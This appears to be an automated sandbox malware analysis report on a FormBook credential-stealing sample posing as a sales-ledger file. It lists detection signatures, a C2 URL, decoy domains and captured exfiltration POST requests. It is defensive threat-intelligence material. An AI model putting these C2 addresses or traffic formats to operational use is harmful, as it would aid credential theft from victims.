Analysis Report Require your Sales Ledger from 01-April-2020.exe

Overview

General Information

Sample Name: Require your Sales Ledger from 01-April-2020.exe
Analysis ID: 385451
MD5: c7c27e1859f1593aedb1eebf0a15175e
SHA1: deb5544c037a7757462afab46ae2ca14a8f7f945
SHA256: d7e71646c9427067e810e1b278beb6ad1f07e6b0c5003d9be2611178e4f5470c
Tags: exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Yara detected Costura Assembly Loader
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.consultoramulticars.com/suod/"], "decoy": ["ynyshs.com", "freethegameboy.info", "mpsaklera.com", "neverlunar.icu", "coffeegoeth.com", "your-card.net", "rmcorredores.com", "binaconsa.com", "themovingmountains.com", "payalbansalinteriordesign.com", "dglala.com", "bettermelifestyle.com", "catnipny.com", "wwwpinxixi.com", "41dongbu.com", "fsdhgfdhkjgfhgsdf.com", "maemarienaturally.com", "1rugbycoachblog.com", "yax53.com", "vv4065.com", "gokcensesli.com", "huangshewangzhan.com", "ubiqshop.com", "therealfeelbeauty.net", "gotanie.com", "magentos6.com", "dektebopdtdl.support", "balabala.run", "skmagicjiksoohalawati.com", "systemandsystems.com", "theprismaticbody.com", "admiralsecuritysolutions.com", "seguro123.com", "uniquetips.net", "benugo-online.com", "domentemenegi24.com", "wisepinch.com", "wujinglingwudao.com", "teachmehowtomortgage.com", "prime-living.wien", "cancelrockethomes.com", "magickennels.info", "fytsky.com", "hyeonjin.net", "cecisgiftstore.com", "bikinibut.com", "laurakonner.com", "pissedoffpainters.com", "colec2c.com", "africandirectors.com", "criss-nutricionymakeup.com", "mathwithprofessorpi.com", "soretyje.com", "sellingparadiseproperties.com", "pinscan1502.com", "lifeunscriptedfilms.com", "alhula.com", "slutdating.online", "sofiadumonde.com", "dasanyang995.com", "fit2x.com", "seniorlivingcaelderly.com", "21stglobalequipments.com", "xiamencapital.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: Require your Sales Ledger from 01-April-2020.exe ReversingLabs: Detection: 29%
Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Require your Sales Ledger from 01-April-2020.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Require your Sales Ledger from 01-April-2020.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe, 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000A.00000000.281364076.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr
Source: Binary string: cmmon32.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: cmmon32.pdbGCTL source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.378446347.0000000001650000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Require your Sales Ledger from 01-April-2020.exe, 00000018.00000002.375057704.00000000012EF000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.481029509.0000000004DBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Require your Sales Ledger from 01-April-2020.exe, cmmon32.exe
Source: Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000019.00000000.354202659.000000000E1C0000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 4x nop then pop ebx 24_2_00407B02
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 4x nop then pop edi 24_2_00416CB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop ebx 32_2_02B17B02
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 32_2_02B26CBF

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 185.53.179.90:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.consultoramulticars.com/suod/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).
Source: global traffic HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 170153Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 32 32 73 76 55 45 78 75 58 69 51 6a 44 6d 75 35 69 6a 62 79 55 67 5a 6f 72 30 7a 72 6b 57 79 39 54 57 38 70 47 62 6b 6b 38 4f 52 34 66 48 53 68 4f 71 32 57 47 78 36 43 79 49 73 64 72 72 77 65 49 6f 79 34 54 47 6a 62 66 4b 7a 51 31 35 51 43 46 4e 4c 6d 35 38 49 53 5f 68 41 30 50 48 6f 30 34 42 53 43 63 75 4e 78 6d 68 55 35 4e 58 45 73 48 4b 6c 37 7a 64 72 4d 45 31 51 48 74 65 47 51 70 48 6a 66 6c 5a 6d 7e 6f 68 71 4f 32 45 45 43 69 39 59 4a 70 4d 2d 63 37 46 4c 72 36 79 6f 6d 6f 57 6b 4c 67 75 44 62 46 28 69 4e 78 5a 52 65 35 49 6b 45 35 68 57 79 49 51 77 67 42 45 6e 56 64 4f 59 30 64 39 59 46 65 45 48 68 6b 4b 55 51 4d 69 4f 70 79 47 55 47 53 63 50 62 6c 42 4c 6c 77 41 69 42 53 38 4d 39 76 35 57 39 4b 4f 5f 58 59 45 34 51 4e 43 32 47 31 67 55 4a 49 66 5f 69 7a 61 55 39 72 69 7a 28 75 6c 4b 5a 6b 4e 44 57 75 4a 30 79 7a 54 30 51 46 76 33 45 48 44 42 59 36 44 58 4f 58 41 6b 44 32 78 5a 6b 38 64 36 54 77 73 41 62 6a 4c 6c 32 4d 64 54 67 59 56 6b 77 77 34 31 79 42 52 30 7a 62 61 6c 69 39 7a 79 69 67 35 75 69 44 28 72 63 38 7e 37 65 78 46 69 34 57 47 73 5a 50 69 6d 62 74 76 38 65 2d 52 63 70 78 46 5f 4b 4d 69 72 32 67 38 42 54 50 44 4d 71 61 6a 6a 59 32 56 57 67 42 32 36 4e 4b 28 35 46 6e 4a 79 6e 41 69 55 52 69 47 54 28 53 69 54 77 52 75 57 53 75 78 48 71 49 48 68 37 42 44 4e 53 75 55 6d 42 74 43 4c 71 31 67 6f 48 36 64 4b 56 4e 47 57 28 67 47 6e 7e 78 28 74 28 62 6b 56 6c 72 74 56 7a 78 35 69 6f 5f 47 65 36 57 73 63 56 62 4f 73 57 45 36 37 33 34 6b 5f 58 69 6c 6c 36 77 4d 36 66 73 70 4c 7e 48 45 50 42 34 45 62 34 42 54 44 37 49 4c 56 31 4b 7e 44 69 54 4e 69 38 4f 73 59 36 42 63 42 78 30 65 49 71 38 5a 34 45 53 48 67 55 75 58 47 53 66 74 6e 30 45 72 45 77 74 73 56 32 63 33 6b 45 37 65 76 42 65 61 46 64 5a 56 32 74 56 58 74 6f 59 31 6c 44 62 4c 73 36 38 30 6c 62 53 69 51 6c 6b 70 46 50 36 62 50 64 46 33 48 30 74 57 4a 7a 49 64 41 44 72 36 6f 37 71 54 51 28 30 49 33 56 51 44 72 7a 35 6a 73 6f 62 46 43 38 71 66 6b 48 51 6b 66 67 65 78 52 36 58 28 39 74 56 56 6d 66 46 73 65 62 74 36 73 6c 53 50 30 6a 56 66 50 4f 36 57 48 52 52 4b 66 63 38 69 73 62 54 7e 52 76 32 52 54 51 30 58 78 66 6b 4d 62 4c 68 54 41 38 74 73 68 4b 31 31 34 46 47 42 7a 38 56 74 52 42 56 73 42 28 6c 6e 4a 51 62 30 35 50 76 48 51 6d 32 45 75 4d 6d 62 48 28 2d 34 57 79 4f 55 75 4a 7a 53 6a 39 56 64 73 65 50 28 4e 74 4a 62 30 54 30 59 50 4e 6b 55 73 4d 71 6e 76 72 4f 53 57 37 30 38 47 69 62 64 6a 33 4c 73 51 76 34 64 74 6a 45 30 4c 41 7a 7e 42 67 51 63 4d 78 64 28 76 72 5a 64 4a 4a 42 4d 76 28 44 30 46 30 41 57 38 4e 4a 77 56 73
Source: C:\Windows\explorer.exe Code function: 25_2_061C67C2 getaddrinfo,setsockopt,recv, 25_2_061C67C2
Source: global traffic HTTP traffic detected: GET /suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown DNS traffic detected: queries for: www.seniorlivingcaelderly.com
Source: unknown HTTP traffic detected: POST /suod/ HTTP/1.1Host: www.seniorlivingcaelderly.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.seniorlivingcaelderly.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.seniorlivingcaelderly.com/suod/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 53 78 6f 3d 44 4f 4c 31 47 33 75 47 75 6b 51 61 35 53 36 56 69 54 57 6d 39 6a 53 45 32 58 6b 4b 76 38 59 64 69 57 54 74 39 54 48 37 67 6e 4b 39 75 39 7e 52 38 74 28 56 73 4f 71 31 55 47 78 35 47 79 46 56 44 4a 36 39 65 4e 49 55 34 54 4f 73 56 34 36 79 52 6c 35 48 44 6c 41 2d 67 35 59 54 53 35 68 31 30 73 72 77 6b 6f 4e 53 47 76 65 4c 74 54 4a 50 7a 73 4c 78 68 58 6d 67 39 32 5a 69 4d 7a 46 43 42 4f 6a 56 59 4e 48 68 53 31 68 78 30 49 78 47 4b 68 34 42 47 79 35 62 56 34 59 68 66 63 74 50 28 62 7a 62 36 38 43 6c 56 45 4b 33 65 47 33 51 49 46 4a 43 64 70 35 58 45 36 41 70 34 5a 63 68 6b 41 59 5f 57 73 43 79 38 50 4e 67 4b 4e 63 66 6c 6e 6a 6b 53 4d 53 78 6d 58 6a 47 4b 68 4a 4e 61 6a 46 62 72 79 77 5a 48 6a 41 41 31 39 68 45 39 64 57 4a 49 6f 31 6f 4b 63 4b 48 4a 31 41 63 4f 4c 7a 4a 73 7a 62 79 28 72 69 5f 72 4d 64 63 4f 30 5a 49 47 39 42 4a 79 77 43 78 61 32 72 51 42 45 33 5a 46 76 28 38 43 46 41 53 62 33 77 6b 76 63 5a 39 51 6a 63 77 61 6a 4c 48 32 4a 70 45 67 59 56 65 77 30 74 61 30 7a 74 30 77 70 53 4d 68 61 48 49 71 41 35 4a 75 7a 76 70 54 75 72 2d 65 78 4e 69 36 6d 58 44 5a 34 47 6d 52 62 72 39 65 66 52 63 70 42 46 5f 48 73 6a 67 7e 54 46 5f 61 4d 44 30 68 71 44 35 58 77 38 6e 71 42 37 69 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Sxo=DOL1G3uGukQa5S6ViTWm9jSE2XkKv8YdiWTt9TH7gnK9u9~R8t(VsOq1UGx5GyFVDJ69eNIU4TOsV46yRl5HDlA-g5YTS5h10srwkoNSGveLtTJPzsLxhXmg92ZiMzFCBOjVYNHhS1hx0IxGKh4BGy5bV4YhfctP(bzb68ClVEK3eG3QIFJCdp5XE6Ap4ZchkAY_WsCy8PNgKNcflnjkSMSxmXjGKhJNajFbrywZHjAA19hE9dWJIo1oKcKHJ1AcOLzJszby(ri_rMdcO0ZIG9BJywCxa2rQBE3ZFv(8CFASb3wkvcZ9QjcwajLH2JpEgYVew0ta0zt0wpSMhaHIqA5JuzvpTur-exNi6mXDZ4GmRbr9efRcpBF_Hsjg~TF_aMD0hqD5Xw8nqB7iVA).
Source: explorer.exe, 00000019.00000000.349774799.0000000008A2E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icogk
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coml1
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnto
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmcP
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/(i
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/-czti
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Bi)
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Pi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0e
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ftYi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Yi
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/d.
